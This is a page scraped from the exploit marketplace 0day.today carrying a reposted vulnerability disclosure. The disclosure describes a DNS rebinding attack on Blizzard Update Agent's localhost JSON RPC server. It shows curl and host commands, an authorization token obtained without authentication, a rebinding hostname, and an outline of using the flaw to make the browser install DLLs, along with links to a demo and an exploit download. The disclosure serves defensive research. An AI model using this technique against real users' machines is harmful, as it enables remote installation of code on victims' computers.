0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Blizzard Update Agent - JSON RPC DNS Rebinding Vulnerability
All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed. The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this: $ curl -si http://localhost:1120/agent HTTP/1.0 200 OK Content-Length: 359 { "pid" : 3140.000000, "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000", "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000", "state" : 1004.000000, "version" : "2.13.4.5955", "region" : "us", "type" : "retail", "opt_in_feedback" : true, "session" : "15409717072196133548", "authorization" : "11A87920224BD1FB22AF5F868CA0E789" } This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property. I don't think this design will work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost. To be clear, this means that *any* website can send privileged commands to the agent. I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames: https://lock.cmpxchg8b.com/rebinder.html Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us: $ host 7f000001.c7f11de3.rbndr.us 7f000001.c7f11de3.rbndr.us has address 127.0.0.1 $ host 7f000001.c7f11de3.rbndr.us 7f000001.c7f11de3.rbndr.us has address 199.241.29.227 $ host 7f000001.c7f11de3.rbndr.us 7f000001.c7f11de3.rbndr.us has address 127.0.0.1 Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up). I just wait for the cached response to expire, and then POST commands to the server. Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc. I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea! http://lock.cmpxchg8b.com/yah4od7N.html See screenshot attached of how it's supposed to look. Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip # 0day.today [2024-12-24] #